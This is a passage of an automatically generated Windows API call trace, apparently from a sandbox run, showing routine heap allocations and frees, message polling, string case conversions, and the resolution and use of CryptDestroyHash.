hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.061] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0206.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.063] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.063] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.063] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.064] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.064] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.064] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0206.064] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0206.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0206.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0206.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.066] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0206.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0206.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.066] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.067] CryptDestroyHash (hHash=0xaa5760) returned 1 [0206.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.067] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.067] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.070] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0206.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0206.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.070] HeapFree (in: 